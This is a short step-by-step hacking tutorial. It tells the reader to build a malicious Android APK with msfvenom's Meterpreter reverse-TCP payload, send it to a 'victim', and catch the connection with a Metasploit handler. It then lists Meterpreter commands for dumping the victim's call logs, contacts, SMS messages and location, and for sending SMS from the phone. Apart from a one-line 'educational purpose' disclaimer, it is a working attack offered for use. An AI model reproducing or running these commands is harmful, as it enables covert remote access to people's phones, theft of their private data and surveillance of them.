Things We Need
Kali Linux installed.
An Android phone.
1. Open Kali terminal.
2. We will be going to use MSFVENOM to create a malicious apk file that we will install on the android phone.
3. Paste these commands in terminal .
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.27.207 R > /root/CyberSucks.apk
4. Change the LHOST to you local IP address and press enter.
5. Now open the root folder and send the CyberSucks.apk to the victim.
6. Open new terminal and enter msfconsole
7. After opening metasploit console type these following commands
which are used to create payload handler which will create connection
between victim and kali PC.
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 172.16.27.207 exploit
Change the LHOST to your local ip address. Also don't close the
8. Wait until victim open the file.
9. After the victim open the file you will get a meterpreter session.
Now open the msfconsole terminal and use session -i 1command
to access the session.
10. In the meterpreter session you can use various commands that are
given below to play different types of tricks on the victim phone like
capturing a photo,screenshot,call logs,sms logs,sending a sms.
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wlan_geolocate Get current lat-long using WLAN information
Don't close the msfconsole terminal.
This is only for educational purpose.